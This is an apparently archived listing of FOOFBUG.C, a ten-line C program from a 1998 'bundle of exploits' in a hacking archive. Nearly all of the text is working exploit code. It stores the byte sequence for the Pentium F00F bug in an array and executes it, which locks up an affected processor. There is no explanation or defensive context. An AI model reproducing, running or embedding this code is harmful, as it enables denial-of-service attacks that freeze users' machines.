home *** CD-ROM | disk | FTP | other *** search
/ Freaks Macintosh Archive / Freaks Macintosh Archive.bin / Freaks Macintosh Archives / Hacking & Misc / bundle of exploits.sit / bundle of exploits / FOOFBUG.C < prev    next >
Text File  |  1998-07-17  |  141b  |  10 lines

  1. // This code exploits the Pentium FO or FOOF Bug.
  2.  
  3. char x [5] = { 0xf0, 0x0f, 0xc7, 0xc8 };
  4.  
  5. main ()
  6. {
  7.        void (*f)() = x;
  8.        f();
  9. }
  10.